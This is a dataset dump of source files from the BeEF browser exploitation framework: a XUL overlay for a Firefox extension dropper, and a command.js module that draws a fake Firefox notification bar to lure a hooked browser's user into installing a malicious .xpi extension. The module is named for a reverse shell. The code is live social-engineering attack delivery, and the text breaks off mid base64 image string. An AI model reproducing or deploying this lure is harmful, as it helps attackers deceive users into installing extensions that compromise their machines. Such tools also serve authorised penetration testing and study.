language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
beef/modules/social_engineering/firefox_extension_dropper/extension/overlay.xul
<?xml version="1.0"?> <overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <script src="bootstrap.js"/> <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script> </overlay>
JavaScript
beef/modules/social_engineering/firefox_extension_reverse_shell/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var xpi_name = '<%= @xpi_name %>'; var ff_extension = '/' + xpi_name + '.xpi'; if(beef.browser.isFF()){ var id = beef.dom.generateID(); var pid = beef.dom.generateID(); var zztop = beef.dom.getHighestZindex()+1; var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'}); var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAEJGlDQ1BJQ0MgUHJvZmlsZQAAOBGFVd9v21QUPolvUqQWPyBYR4eKxa9VU1u5GxqtxgZJk6XtShal6dgqJOQ6N4mpGwfb6baqT3uBNwb8AUDZAw9IPCENBmJ72fbAtElThyqqSUh76MQPISbtBVXhu3ZiJ1PEXPX6yznfOec7517bRD1fabWaGVWIlquunc8klZOnFpSeTYrSs9RLA9Sr6U4tkcvNEi7BFffO6+EdigjL7ZHu/k72I796i9zRiSJPwG4VHX0Z+AxRzNRrtksUvwf7+Gm3BtzzHPDTNgQCqwKXfZwSeNHHJz1OIT8JjtAq6xWtCLwGPLzYZi+3YV8DGMiT4VVuG7oiZpGzrZJhcs/hL49xtzH/Dy6bdfTsXYNY+5yluWO4D4neK/ZUvok/17X0HPBLsF+vuUlhfwX4j/rSfAJ4H1H0qZJ9dN7nR19frRTeBt4Fe9FwpwtN+2p1MXscGLHR9SXrmMgjONd1ZxKzpBeA71b4tNhj6JGoyFNp4GHgwUp9qplfmnFW5oTdy7NamcwCI49kv6fN5IAHgD+0rbyoBc3SOjczohbyS1drbq6pQdqumllRC/0ymTtej8gpbbuVwpQfyw66dqEZyxZKxtHpJn+tZnpnEdrYBbueF9qQn93S7HQGGHnYP7w6L+YGHNtd1FJitqPAR+hERCNOFi1i1alKO6RQnjKUxL1GNjwlMsiEhcPLYTEiT9ISbN15OY/jx4SMshe9LaJRpTvHr3C/ybFYP1PZAfwfYrPsMBtnE6SwN9ib7AhLwTrBDgUKcm06FSrTfSj187xPdVQWOk5Q8vxAfSiIUc7Z7xr6zY/+hpqwSyv0I0/QMTRb7RMgBxNodTfSPqdraz/sDjzKBrv4zu2+a2t0/HHzjd2Lbcc2sG7GtsL42K+xLfxtUgI7YHqKlqHK8HbCCXgjHT1cAdMlDetv4FnQ2lLasaOl6vmB0CMmwT/IPszSueHQqv6i/qluqF+oF9TfO2qEGTumJH0qfSv9KH0nfS/9TIp0Wboi/SRdlb6RLgU5u++9nyXYe69fYRPdil1o1WufNSdTTsp75BfllPy8/LI8G7AUuV8ek6fkvfDsCfbNDP0dvRh0CrNqTbV7LfEEGDQPJQadBtfGVMWEq3QWWdufk6ZSNsjG2PQjp3ZcnOWWing6noonSInvi0/Ex+IzAreevPhe+CawpgP1/pMTMDo64G0sTCXIM+KdOnFWRfQKdJvQzV1+Bt8OokmrdtY2yhVX2a+qrykJfMq4Ml3VR4cVzTQVz+UoNne4vcKLoyS+gyKO6EHe+75Fdt0Mbe5bRIf/wjvrVmhbqBN97RD1vxrahvBOfOYzoosH9bq94uejSOQGkVM6sN/7HelL4t10t9F4gPdVzydEOx83Gv+uNxo7XyL/FtFl8z9ZAHF4bBsrEwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAW5pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IlhNUCBDb3JlIDQuNC4wIj4KICAgPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4KICAgICAgPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIKICAgICAgICAgICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIj4KICAgICAgICAgPGRjOnN1YmplY3Q+CiAgICAgICAgICAgIDxyZGY6QmFnLz4KICAgICAgICAgPC9kYzpzdWJqZWN0PgogICAgICA8L3JkZjpEZXNjcmlwdGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4K5T8NQQAAAE5JREFUGBmFTsENwEAIgg7T/efpMlRMMLafM1EBMUoAqoT0uE2Qd2NWbYOZJHOQHI0lfgQbEl64TLKZwdbasAd/3IZ9M4ZoxyfnxP5j4xfHNiMDVDlNEAAAAABJRU5ErkJggg==);'}) var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'}); $j('body').append(el); var hid = '#'+id; var hpid = '#'+pid; $j(hid).append(elp); $j(hpid).html("<%= @notification_text %>&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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